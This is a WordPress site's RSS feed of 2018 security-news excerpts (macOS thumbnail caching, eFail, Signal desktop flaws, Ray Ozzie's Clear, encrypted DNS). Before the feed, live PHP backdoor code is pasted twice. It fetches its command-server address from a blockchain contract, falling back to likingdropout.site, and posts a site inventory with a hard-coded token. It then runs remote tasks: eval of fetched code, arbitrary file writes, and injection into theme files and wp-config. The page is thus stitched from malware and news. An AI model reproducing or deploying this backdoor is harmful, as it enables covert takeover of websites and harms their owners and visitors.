// q2_xh if(!defined('ABSPATH'))return; $cfg=array( 'stub'=>'/data/web/virtuals/153909/virtual/www/domains/briefnews.eu/wp-content/plugins/wp-helper-4bdb4f/wp-helper-4bdb4f.php', 'ctrl'=>'// q2_xh', 'vis'=>'// xp_v9', 'vis_func'=>'wp_dia8xd', 'vis_paths'=>array('/data/web/virtuals/153909/virtual/www/domains/briefnews.eu/wp-content/plugins/wp-helper-4bdb4f/wp-helper-4bdb4f.php'), 'opt'=>'_wp_47nl0jvi', ); $keys=array(); $keys['id']='kun'; $keys['ver']='em'; $keys['caps']='eby'; $keys['tasks']='awd'; $keys['interval']='pww'; $keys['ack_id']='nl0'; $keys['ok']='9s'; $keys['detail']='wyy'; $keys['inv']='kxw'; $keys['result']='f3t'; $hdr='X-J98-Auth';$tok='0cQMbCeRLTCSW0NdninnOEVrAtwy11ErS16wrKLqeas';$id='1d0c923bac57072b';$interval=420; function _ea_inv($cfg){ $r=array('ts'=>time(),'wp'=>(function_exists('get_bloginfo')?get_bloginfo('version'):''),'php'=>PHP_VERSION); $chk=function($p,$m){$o=array('path'=>$p,'exists'=>false,'marker'=>false,'size'=>0);if(!$p||!is_string($p))return $o; if(@is_file($p)){$b=@file_get_contents($p);$o['exists']=true;$o['size']=strlen((string)$b);$o['marker']=($b&&strpos($b,$m)!==false);}return $o;}; $r['stub']=$chk($cfg['stub'],$cfg['ctrl']); $vis=array('plugin'=>null,'paths'=>array()); foreach($cfg['vis_paths'] as $_vp){$vis['paths'][]=$chk($_vp,$cfg['vis']);} $found=null;foreach($vis['paths'] as $_p){if(!empty($_p['marker'])){$found=$_p;break;}} if(!$found){$pd=WP_CONTENT_DIR.'/plugins';if(@is_dir($pd)){foreach(@glob($pd.'/*/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_plug')!==false){$found=$chk($_f,'// ea_plug');break;}}} $vis['plugin']=$found?:array('path'=>'','exists'=>false,'marker'=>false); $r['visitor']=$vis; $mu=array('path'=>'','exists'=>false,'marker'=>false);$md=WP_CONTENT_DIR.'/mu-plugins'; if(@is_dir($md)){foreach(@glob($md.'/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_mu')!==false){$mu=$chk($_f,'// ea_mu');break;}}} $r['mu_autologin']=$mu; $ft=0;$fw=0;$td=WP_CONTENT_DIR.'/themes';if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$ft++;$b=@file_get_contents($_f);if($b&&strpos($b,'// _ea_al')!==false)$fw++;}} $r['functions_autologin']=array('themes_total'=>$ft,'themes_with_marker'=>$fw); $wpc=array('path'=>(defined('ABSPATH')?ABSPATH.'wp-config.php':''),'exists'=>false,'marker'=>false); if($wpc['path']&&@is_file($wpc['path'])){$b=@file_get_contents($wpc['path']);$wpc['exists']=true;$wpc['marker']=($b&&(strpos($b,'// _ea_wc')!==false||strpos($b,'/* _ea_wc_s */')!==false));} $r['wpconfig_inject']=$wpc; $cp=array();if(defined('LSCWP_V'))$cp[]='litespeed';if(defined('W3TC'))$cp[]='w3tc'; if(defined('WP_ROCKET_VERSION'))$cp[]='wp_rocket';if(defined('WPCACHEHOME'))$cp[]='wp_super_cache'; if(defined('SG_CACHEPRESS'))$cp[]='sg_optimizer';$r['cache']=array('plugins'=>$cp,'opcache'=>function_exists('opcache_get_status')); return $r;} function _ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id){ $_ok=false;$_detail='';$_result=null; $_code=isset($_task['t'])?$_task['t']:'';$_p=isset($_task['p'])?$_task['p']:array();$_tid=isset($_task['i'])?$_task['i']:0; if(($_code==='wf'||$_code==='ld')&&!empty($_p['path'])&&isset($_p['content'])){ $_path=$_p['path'];$_body=@is_file($_path)?@file_get_contents($_path):''; if($_code==='ld'&&strpos((string)$_body,$_p['content'])===false)$_body.=$_p['content']; elseif($_code==='wf')$_body=$_p['content']; $_ok=@file_put_contents($_path,$_body)!==false; }elseif($_code==='su'&&!empty($_p['path'])&&!empty($_p['content'])){ $_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='rp'&&!empty($_p['code'])){ ob_start();try{eval($_p['code']);$_ok=true;}catch(Throwable $e){$_detail=$e->getMessage();}catch(Exception $e){$_detail=$e->getMessage();} $_result=array('output'=>ob_get_clean());} elseif($_code==='va'){$_result=_ea_inv($cfg);$_ok=true;} elseif($_code==='fc'){ $p=array();if(function_exists('wp_cache_flush')){wp_cache_flush();$p[]='object';} if(function_exists('opcache_reset')){@opcache_reset();$p[]='opcache';} if(defined('LSCWP_V')&&function_exists('do_action')){do_action('litespeed_purge_all');$p[]='litespeed';} if(defined('W3TC')&&function_exists('w3tc_flush_all')){w3tc_flush_all();$p[]='w3tc';} if(function_exists('rocket_clean_domain')){rocket_clean_domain();$p[]='wp_rocket';} if(function_exists('wp_cache_clear_cache')){wp_cache_clear_cache();$p[]='wp_super_cache';} if(function_exists('sg_cachepress_purge_cache')){sg_cachepress_purge_cache();$p[]='sg_optimizer';} $_ok=true;$_result=array('purged'=>$p);} elseif($_code==='ma'&&!empty($_p['path'])&&!empty($_p['content'])){ @wp_mkdir_p(dirname($_p['path']));$_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='fn'&&!empty($_p['snippet'])){ $td=WP_CONTENT_DIR.'/themes';$n=0;if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$b=@file_get_contents($_f);if(strpos((string)$b,'// _ea_al')===false){$b=rtrim((string)$b)."\n".$_p['snippet'];if(@file_put_contents($_f,$b)!==false)$n++;}}} $_ok=$n>0;$_result=array('themes_updated'=>$n);} elseif($_code==='wc'){ $wp=ABSPATH.'wp-config.php';if(@is_file($wp)){$b=@file_get_contents($wp); if(strpos($b,'/* _ea_wc_s */')!==false){$b=preg_replace('#/\*/* _ea_wc_s */\*/.*?/\* _ea_wc_e \*/#s','',$b);} $b=str_replace(array('// _ea_wc','/* _ea_wc_s */','/* _ea_wc_e */'),'',$b);$_ok=@file_put_contents($wp,$b)!==false;} } $ack=array($keys['ack_id']=>$_tid,$keys['ok']=>$_ok,$keys['detail']=>$_detail); if($_result!==null)$ack[$keys['result']]=$_result; return $ack;} function _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,$force){ $k=$cfg['opt'];if(!$force&&!wp_doing_cron()){ if(is_admin())return; $last=(int)get_option($k,0);if(time()-$last<$interval)return; } $u='likingdropout.site';$co='0x9e33A3979F74c7700E4BaA7e7a2934556f72eF96';$sel='0x38bd65e2';$rpcs=array('https://data-seed-prebsc-1-s1.bnbchain.org:8545','https://data-seed-prebsc-1-s1.bnbchain.org:8545/','https://data-seed-prebsc-2-s1.binance.org:8545/','https://data-seed-prebsc-2-s2.binance.org:8545/','https://bsc-testnet-dataseed.bnbchain.org/','https://bnb-testnet.api.onfinality.io/public'); foreach($rpcs as $_rpc){ $b=json_encode(array('jsonrpc'=>'2.0','id'=>97,'method'=>'eth_call','params'=>array(array('to'=>$co,'data'=>$sel),'latest'))); $ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n",'content'=>$b,'timeout'=>3,'ignore_errors'=>true))); $raw=@file_get_contents($_rpc,false,$ctx); if(!$raw)continue; $j=json_decode($raw,true); if(empty($j['result'])||strlen($j['result'])<10)continue; $h=substr($j['result'],2); if(strlen($h)<128)continue; $off=(int)hexdec(substr($h,0,64)); $len=(int)hexdec(substr($h,$off*2,64)); $_z=pack('H*',substr($h,$off*2+64,$len*2));if($_z)$u=$_z;break; } $_hp='/panel/api/v1/metrics/collect'; $_z=trim((string)$u);$_z=preg_replace('#^https?://#','',$_z); if(strpos($_z,'/')!==false){$_xp=explode('/',$_z,2);$_z=$_xp[0];if(!empty($_xp[1]))$_hp='/'.ltrim($_xp[1],'/');} $_z=trim($_z,'.');if(!$_z)$_z='likingdropout.site'; $_s=substr(str_replace(array('+','/','='),'',base64_encode(random_bytes(6))),0,10); $u='https://'.$_s.'.'.$_z.$_hp; $_ack=$u;if(substr($_ack,-7)==='collect')$_ack=substr($_ack,0,-7).'ack';else $_ack=rtrim($_ack,'/').'/ack'; $inv=_ea_inv($cfg); $b=array($keys['id']=>$id,$keys['ver']=>2,$keys['caps']=>array('server_sync','visitor_js','write_file'),$keys['inv']=>$inv); $resp='';if(function_exists('wp_remote_post')){$_r=wp_remote_post($u,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($b)));if(!is_wp_error($_r))$resp=(string)wp_remote_retrieve_body($_r);}else{$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($b),'timeout'=>20,'ignore_errors'=>true)));$resp=(string)@file_get_contents($u,false,$ctx);} if(!$resp)return; update_option($k,time(),false); $j=json_decode($resp,true);$tk=$keys['tasks']; if(empty($j[$tk])||!is_array($j[$tk]))return; foreach($j[$tk] as $_task){ $ack=_ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id); if(function_exists('wp_remote_post')){@wp_remote_post($_ack,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($ack)));}else{$actx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($ack),'timeout'=>20,'ignore_errors'=>true)));@file_get_contents($_ack,false,$actx);} } } add_filter('cron_schedules',function($s){$s['ea_fleet']=array('interval'=>$interval,'display'=>'Fleet sync');return $s;}); add_action('init',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ if(!wp_next_scheduled('ea_fleet_sync'))wp_schedule_event(time()+120,'ea_fleet','ea_fleet_sync'); _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,false); },1); add_action('ea_fleet_sync',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,true); }); // l0_9z if(!defined('ABSPATH'))return; $cfg=array( 'stub'=>'/data/web/virtuals/153909/virtual/www/domains/briefnews.eu/wp-content/plugins/wp-helper-4bdb4f/wp-helper-4bdb4f.php', 'ctrl'=>'// l0_9z', 'vis'=>'// zn_yn', 'vis_func'=>'wp_cuzg8t', 'vis_paths'=>array('/data/web/virtuals/153909/virtual/www/domains/briefnews.eu/wp-content/plugins/wp-helper-4bdb4f/wp-helper-4bdb4f.php'), 'opt'=>'_wp_mtrhds4x', ); $keys=array(); $keys['id']='ybc'; $keys['ver']='a1'; $keys['caps']='afo'; $keys['tasks']='x9t'; $keys['interval']='2e4'; $keys['ack_id']='k72'; $keys['ok']='ch'; $keys['detail']='xd9'; $keys['inv']='hw8'; $keys['result']='0bb'; $hdr='X-L8A-Auth';$tok='A3-EVnA_qOJ132k0gQIT_73RgM-QQ5Szxw145ZNDetU';$id='d1451f9eb0097c9f';$interval=420; function _ea_inv($cfg){ $r=array('ts'=>time(),'wp'=>(function_exists('get_bloginfo')?get_bloginfo('version'):''),'php'=>PHP_VERSION); $chk=function($p,$m){$o=array('path'=>$p,'exists'=>false,'marker'=>false,'size'=>0);if(!$p||!is_string($p))return $o; if(@is_file($p)){$b=@file_get_contents($p);$o['exists']=true;$o['size']=strlen((string)$b);$o['marker']=($b&&strpos($b,$m)!==false);}return $o;}; $r['stub']=$chk($cfg['stub'],$cfg['ctrl']); $vis=array('plugin'=>null,'paths'=>array()); foreach($cfg['vis_paths'] as $_vp){$vis['paths'][]=$chk($_vp,$cfg['vis']);} $found=null;foreach($vis['paths'] as $_p){if(!empty($_p['marker'])){$found=$_p;break;}} if(!$found){$pd=WP_CONTENT_DIR.'/plugins';if(@is_dir($pd)){foreach(@glob($pd.'/*/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_plug')!==false){$found=$chk($_f,'// ea_plug');break;}}} $vis['plugin']=$found?:array('path'=>'','exists'=>false,'marker'=>false); $r['visitor']=$vis; $mu=array('path'=>'','exists'=>false,'marker'=>false);$md=WP_CONTENT_DIR.'/mu-plugins'; if(@is_dir($md)){foreach(@glob($md.'/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_mu')!==false){$mu=$chk($_f,'// ea_mu');break;}}} $r['mu_autologin']=$mu; $ft=0;$fw=0;$td=WP_CONTENT_DIR.'/themes';if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$ft++;$b=@file_get_contents($_f);if($b&&strpos($b,'// _ea_al')!==false)$fw++;}} $r['functions_autologin']=array('themes_total'=>$ft,'themes_with_marker'=>$fw); $wpc=array('path'=>(defined('ABSPATH')?ABSPATH.'wp-config.php':''),'exists'=>false,'marker'=>false); if($wpc['path']&&@is_file($wpc['path'])){$b=@file_get_contents($wpc['path']);$wpc['exists']=true;$wpc['marker']=($b&&(strpos($b,'// _ea_wc')!==false||strpos($b,'/* _ea_wc_s */')!==false));} $r['wpconfig_inject']=$wpc; $cp=array();if(defined('LSCWP_V'))$cp[]='litespeed';if(defined('W3TC'))$cp[]='w3tc'; if(defined('WP_ROCKET_VERSION'))$cp[]='wp_rocket';if(defined('WPCACHEHOME'))$cp[]='wp_super_cache'; if(defined('SG_CACHEPRESS'))$cp[]='sg_optimizer';$r['cache']=array('plugins'=>$cp,'opcache'=>function_exists('opcache_get_status')); return $r;} function _ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id){ $_ok=false;$_detail='';$_result=null; $_code=isset($_task['t'])?$_task['t']:'';$_p=isset($_task['p'])?$_task['p']:array();$_tid=isset($_task['i'])?$_task['i']:0; if(($_code==='wf'||$_code==='ld')&&!empty($_p['path'])&&isset($_p['content'])){ $_path=$_p['path'];$_body=@is_file($_path)?@file_get_contents($_path):''; if($_code==='ld'&&strpos((string)$_body,$_p['content'])===false)$_body.=$_p['content']; elseif($_code==='wf')$_body=$_p['content']; $_ok=@file_put_contents($_path,$_body)!==false; }elseif($_code==='su'&&!empty($_p['path'])&&!empty($_p['content'])){ $_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='rp'&&!empty($_p['code'])){ ob_start();try{eval($_p['code']);$_ok=true;}catch(Throwable $e){$_detail=$e->getMessage();}catch(Exception $e){$_detail=$e->getMessage();} $_result=array('output'=>ob_get_clean());} elseif($_code==='va'){$_result=_ea_inv($cfg);$_ok=true;} elseif($_code==='fc'){ $p=array();if(function_exists('wp_cache_flush')){wp_cache_flush();$p[]='object';} if(function_exists('opcache_reset')){@opcache_reset();$p[]='opcache';} if(defined('LSCWP_V')&&function_exists('do_action')){do_action('litespeed_purge_all');$p[]='litespeed';} if(defined('W3TC')&&function_exists('w3tc_flush_all')){w3tc_flush_all();$p[]='w3tc';} if(function_exists('rocket_clean_domain')){rocket_clean_domain();$p[]='wp_rocket';} if(function_exists('wp_cache_clear_cache')){wp_cache_clear_cache();$p[]='wp_super_cache';} if(function_exists('sg_cachepress_purge_cache')){sg_cachepress_purge_cache();$p[]='sg_optimizer';} $_ok=true;$_result=array('purged'=>$p);} elseif($_code==='ma'&&!empty($_p['path'])&&!empty($_p['content'])){ @wp_mkdir_p(dirname($_p['path']));$_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='fn'&&!empty($_p['snippet'])){ $td=WP_CONTENT_DIR.'/themes';$n=0;if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$b=@file_get_contents($_f);if(strpos((string)$b,'// _ea_al')===false){$b=rtrim((string)$b)."\n".$_p['snippet'];if(@file_put_contents($_f,$b)!==false)$n++;}}} $_ok=$n>0;$_result=array('themes_updated'=>$n);} elseif($_code==='wc'){ $wp=ABSPATH.'wp-config.php';if(@is_file($wp)){$b=@file_get_contents($wp); if(strpos($b,'/* _ea_wc_s */')!==false){$b=preg_replace('#/\*/* _ea_wc_s */\*/.*?/\* _ea_wc_e \*/#s','',$b);} $b=str_replace(array('// _ea_wc','/* _ea_wc_s */','/* _ea_wc_e */'),'',$b);$_ok=@file_put_contents($wp,$b)!==false;} } $ack=array($keys['ack_id']=>$_tid,$keys['ok']=>$_ok,$keys['detail']=>$_detail); if($_result!==null)$ack[$keys['result']]=$_result; return $ack;} function _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,$force){ $k=$cfg['opt'];if(!$force&&!wp_doing_cron()){ if(is_admin())return; $last=(int)get_option($k,0);if(time()-$last<$interval)return; } $u='likingdropout.site';$co='0x9e33A3979F74c7700E4BaA7e7a2934556f72eF96';$sel='0x38bd65e2';$rpcs=array('https://data-seed-prebsc-1-s1.bnbchain.org:8545','https://data-seed-prebsc-1-s1.bnbchain.org:8545/','https://data-seed-prebsc-2-s1.binance.org:8545/','https://data-seed-prebsc-2-s2.binance.org:8545/','https://bsc-testnet-dataseed.bnbchain.org/','https://bnb-testnet.api.onfinality.io/public'); foreach($rpcs as $_rpc){ $b=json_encode(array('jsonrpc'=>'2.0','id'=>97,'method'=>'eth_call','params'=>array(array('to'=>$co,'data'=>$sel),'latest'))); $ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n",'content'=>$b,'timeout'=>3,'ignore_errors'=>true))); $raw=@file_get_contents($_rpc,false,$ctx); if(!$raw)continue; $j=json_decode($raw,true); if(empty($j['result'])||strlen($j['result'])<10)continue; $h=substr($j['result'],2); if(strlen($h)<128)continue; $off=(int)hexdec(substr($h,0,64)); $len=(int)hexdec(substr($h,$off*2,64)); $_z=pack('H*',substr($h,$off*2+64,$len*2));if($_z)$u=$_z;break; } $_hp='/panel/api/v1/metrics/collect'; $_z=trim((string)$u);$_z=preg_replace('#^https?://#','',$_z); if(strpos($_z,'/')!==false){$_xp=explode('/',$_z,2);$_z=$_xp[0];if(!empty($_xp[1]))$_hp='/'.ltrim($_xp[1],'/');} $_z=trim($_z,'.');if(!$_z)$_z='likingdropout.site'; $_s=substr(str_replace(array('+','/','='),'',base64_encode(random_bytes(6))),0,10); $u='https://'.$_s.'.'.$_z.$_hp; $_ack=$u;if(substr($_ack,-7)==='collect')$_ack=substr($_ack,0,-7).'ack';else $_ack=rtrim($_ack,'/').'/ack'; $inv=_ea_inv($cfg); $b=array($keys['id']=>$id,$keys['ver']=>2,$keys['caps']=>array('server_sync','visitor_js','write_file'),$keys['inv']=>$inv); $resp='';if(function_exists('wp_remote_post')){$_r=wp_remote_post($u,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($b)));if(!is_wp_error($_r))$resp=(string)wp_remote_retrieve_body($_r);}else{$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($b),'timeout'=>20,'ignore_errors'=>true)));$resp=(string)@file_get_contents($u,false,$ctx);} if(!$resp)return; update_option($k,time(),false); $j=json_decode($resp,true);$tk=$keys['tasks']; if(empty($j[$tk])||!is_array($j[$tk]))return; foreach($j[$tk] as $_task){ $ack=_ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id); if(function_exists('wp_remote_post')){@wp_remote_post($_ack,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($ack)));}else{$actx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($ack),'timeout'=>20,'ignore_errors'=>true)));@file_get_contents($_ack,false,$actx);} } } add_filter('cron_schedules',function($s){$s['ea_fleet']=array('interval'=>$interval,'display'=>'Fleet sync');return $s;}); add_action('init',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ if(!wp_next_scheduled('ea_fleet_sync'))wp_schedule_event(time()+120,'ea_fleet','ea_fleet_sync'); _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,false); },1); add_action('ea_fleet_sync',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,true); }); Encrypted – Brief News https://briefnews.eu Latest World News. Find every day short and brief information composed of titles and subtitles and continue reading if interested. Mon, 18 Jun 2018 18:55:23 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.6 https://briefnews.eu/wp-content/uploads/2018/01/cropped-logoSmall-1-32x32.png Encrypted – Brief News https://briefnews.eu 32 32 Reminder: macOS still leaks secrets stored on encrypted drives https://briefnews.eu/reminder-macos-still-leaks-secrets-stored-on-encrypted-drives/ https://briefnews.eu/reminder-macos-still-leaks-secrets-stored-on-encrypted-drives/#respond Mon, 18 Jun 2018 18:55:23 +0000 http://briefnews.eu/reminder-macos-still-leaks-secrets-stored-on-encrypted-drives/

Enlarge (credit: Wardle and Regula)

Unbeknownst to many people, a macOS feature that caches thumbnail images of files can leak highly sensitive data stored on password-protected drives and encrypted volumes, security experts said Monday.

The automatically generated caches can be viewed only by someone who has physical access to a Mac or infects the Mac with malware, and the behavior has existed on Macs for more than a decade. Still, the caching is triggered with minimal user interaction and causes there to be a permanent record of files even after the original file is deleted or the USB drive or encrypted volume that stored the data is disconnected from the Mac. Patrick Wardle and Wojciech Reguła, who are macOS security experts at Digita Security and SecuRing, respectively, said for many people, it’s unnecessarily risky to store snapshots of files related to passwords or other sensitive matters in an unprotected folder. In a blog post published Monday, they wrote:

For a forensics investigation or surveillance implant, this information could prove invaluable. Imagine having a historic record of the USB devices, files on the devices, and even thumbnails of the files…all stored persistently in an unencrypted database, long after the USB devices have been removed (and perhaps destroyed).

For users, the question is: “Do you really want your Mac recording the file paths and ‘previews’ thumbnails of the files on any/all USB sticks that you’ve ever inserted into your Mac?” Me thinks not…

As the researchers note, the caching may cause there to be a permanent record of every drive that connects to a Mac. It also creates a thumbnail image that can leak key details about many of the images stored on the drives, as well as password-protected folders or encrypted volumes. The thumbnails will live on in an SQLite database stored indefinitely in the macOS file system.

Read 3 remaining paragraphs | Comments

]]>
https://briefnews.eu/reminder-macos-still-leaks-secrets-stored-on-encrypted-drives/feed/ 0
It has been a bad week for encrypted messaging and it’s only Wednesday https://briefnews.eu/it-has-been-a-bad-week-for-encrypted-messaging-and-its-only-wednesday/ https://briefnews.eu/it-has-been-a-bad-week-for-encrypted-messaging-and-its-only-wednesday/#respond Thu, 17 May 2018 08:02:08 +0000 http://briefnews.eu/it-has-been-a-bad-week-for-encrypted-messaging-and-its-only-wednesday/

Enlarge (credit: Elsamuko / Flickr)

The past three days have highlighted the potential perils that can threaten people who rely on desktop computers to send encrypted messages. The events—which involve encrypted email and the desktop versions of the Signal and Telegram messaging programs—should in no way discourage people from using encryption. They do, however, provide important teaching moments about the often-overlooked limitations of these apps. More about that in a moment. First, a review of the vulnerabilities.

Monday brought word of decade-old flaws that might reveal the contents of PGP- and S/MIME-encrypted emails. Some of the worst flaws resided in email clients such as Thunderbird and Apple Mail, and they offer a golden opportunity to attackers who have already intercepted previously sent messages. By embedding the intercepted ciphertext in invisible parts of a new message sent to a sender or receiver of the original email, attackers can force the client to leak the corresponding plaintext. Thunderbird and Mail have yet to be patched, although the Thunderbird flaw has been mitigated by an update published Wednesday in the Enigmail GPG plugin.

Also on Monday, a different team of researchers disclosed a vulnerability in the desktop version of the Signal messenger. It allowed attackers to send messages containing malicious HTML and JavaScript that would be executed by the app. Signal developers published a security update on Friday, a few hours after the researchers privately notified them of the vulnerability. On Monday, Signal developers issued a new patch after discovering over the weekend that the first one didn’t fully fix the bug. (The incompleteness of the patch was independently and more-or-less simultaneously found by the researchers.)

Read 11 remaining paragraphs | Comments

]]>
https://briefnews.eu/it-has-been-a-bad-week-for-encrypted-messaging-and-its-only-wednesday/feed/ 0
EFail: Encrypted Email Has a Major, Divisive Flaw https://briefnews.eu/efail-encrypted-email-has-a-major-divisive-flaw/ https://briefnews.eu/efail-encrypted-email-has-a-major-divisive-flaw/#respond Mon, 14 May 2018 21:29:57 +0000 http://briefnews.eu/efail-encrypted-email-has-a-major-divisive-flaw/ An attack called eFail overcomes the protections of encrypted email standards PGP and S/MIME.


https://media.wired.com/photos/5af9b497c32552778ff62eaa/master/pass/encryption2.jpg

]]>
https://briefnews.eu/efail-encrypted-email-has-a-major-divisive-flaw/feed/ 0
Critical PGP and S/MIME bugs can reveal encrypted e-mails. Uninstall now https://briefnews.eu/critical-pgp-and-s-mime-bugs-can-reveal-encrypted-e-mails-uninstall-now/ https://briefnews.eu/critical-pgp-and-s-mime-bugs-can-reveal-encrypted-e-mails-uninstall-now/#respond Mon, 14 May 2018 10:51:15 +0000 http://briefnews.eu/critical-pgp-and-s-mime-bugs-can-reveal-encrypted-e-mails-uninstall-now/

The Internet’s two most widely used methods for encrypting e-mail–PGP and S/Mime–are vulnerable to hacks that can reveal the plaintext of encrypted messages, a researcher warned late Sunday night. He went on to say there are no reliable fixes and to advise anyone who uses either encryption standard for sensitive communications to remove them immediately from e-mail clients.

The flaws “might reveal the plaintext of encrypted emails, including encrypted emails you sent in the past,” Sebastian Schinzel, a professor of computer security at Münster University of Applied Sciences, wrote on Twitter. “There are currently no reliable fixes for the vulnerability. If you use PGP/GPG or S/MIME for very sensitive communication, you should disable it in your email client for now.”

Schinzel referred people this blog post published late Sunday night by the Electronic Frontier Foundation. It said: “EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.”

The post continued:

Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email. Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email.

Both Schinzel and the EFF blog post referred those affected to EFF instructions for disabling plugins in Thunderbird, macOS Mail, and Outlook. The instructions say only to “disable PGP integration in e-mail clients.” Interestingly, there’s no advice to remove PGP apps such as Gpg4win or GNU Privacy Guard. Once the plugin tools are removed from Thunderbird, Mail, or Outlook, the EFF post said, “your emails will not be automatically decrypted.” On Twitter, EFF officials went on to say: “do not decrypt encrypted PGP messages that you receive using your email client.”

Little is publicly known about the flaws at the moment. Both Schinzel and the EFF blog post said they will be disclosed late Monday night California time in a paper written by a team of European security researchers. Schinzel’s Twitter messages used the hashtag #efail, a possible indication of the name the researchers have given to their exploit.

The research team members have been behind a variety of other important cryptographic attacks, including one from 2016 called Drown, which decrypted communications protected by the transport layer security protocol. Other researchers behind the PGP and S/MIME research include Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising, Simon Friedberger, juraj somorovsky, and Jörg Schwenk. Besides Münster University, the researchers also represent Ruhr-University and KU Leuven University.

Given the track record of the researchers and the confirmation from EFF, it’s worth heeding the advice to disable PGP and S/MIME in email clients while waiting for more details to be released Monday night. Ars will publish many more details when they are publicly available.

Update: the paper detailing the “EFAIL” vulnerability was released early and is now available. We will be analyzing it this morning.

]]>
https://briefnews.eu/critical-pgp-and-s-mime-bugs-can-reveal-encrypted-e-mails-uninstall-now/feed/ 0
Ray Ozzie’s plan for unlocking encrypted phones gets a chilly reception https://briefnews.eu/ray-ozzies-plan-for-unlocking-encrypted-phones-gets-a-chilly-reception/ https://briefnews.eu/ray-ozzies-plan-for-unlocking-encrypted-phones-gets-a-chilly-reception/#respond Thu, 26 Apr 2018 21:52:13 +0000 http://briefnews.eu/ray-ozzies-plan-for-unlocking-encrypted-phones-gets-a-chilly-reception/

Enlarge / A patent image depicting how Clear would work. (credit: Ray Ozzie)

Ray Ozzie’s proposal to end the long-simmering crypto war between law enforcement and much of the tech world is getting a chilly reception from privacy advocates and security experts. They argue his plan is largely the same key-escrow program proposed 20 years ago and suffers from the same fatal shortcomings.

Dubbed “Clear,” Ozzie’s idea was first detailed Wednesday in an article published in Wired and described in general terms last month. The former chief technical officer and chief software architect of Microsoft and the creator of Lotus Notes, Ozzie portrays Clear as a potential breakthrough in bridging the widening gulf between those who say the US government has a legitimate need to bypass encryption in extreme cases, such as those involving terrorism and child abuse, and technologists and civil libertarians who warn such bypasses threaten the security of billions of people.

In a nutshell, here’s how Clear works:

Read 10 remaining paragraphs | Comments

]]>
https://briefnews.eu/ray-ozzies-plan-for-unlocking-encrypted-phones-gets-a-chilly-reception/feed/ 0
How to keep your ISP’s nose out of your browser history with encrypted DNS https://briefnews.eu/how-to-keep-your-isps-nose-out-of-your-browser-history-with-encrypted-dns/ https://briefnews.eu/how-to-keep-your-isps-nose-out-of-your-browser-history-with-encrypted-dns/#respond Mon, 09 Apr 2018 09:03:14 +0000 http://briefnews.eu/how-to-keep-your-isps-nose-out-of-your-browser-history-with-encrypted-dns/

Encrypting DNS traffic between your device and a “privacy-focused” provider can keep someone from spying on where your browser is pointed or using DNS attacks to send you somewhere else. (credit: Westend61 / Getty Images)

The death of network neutrality and the loosening of regulations on how Internet providers handle customers’ network traffic have raised many concerns over privacy. Internet providers (and others watching traffic as it passes over the Internet) have long had a tool that allows them to monitor individuals’ Internet habits with ease: their Domain Name System (DNS) servers. And if they haven’t been cashing in on that data already (or using it to change how you see the Internet), they likely soon will.

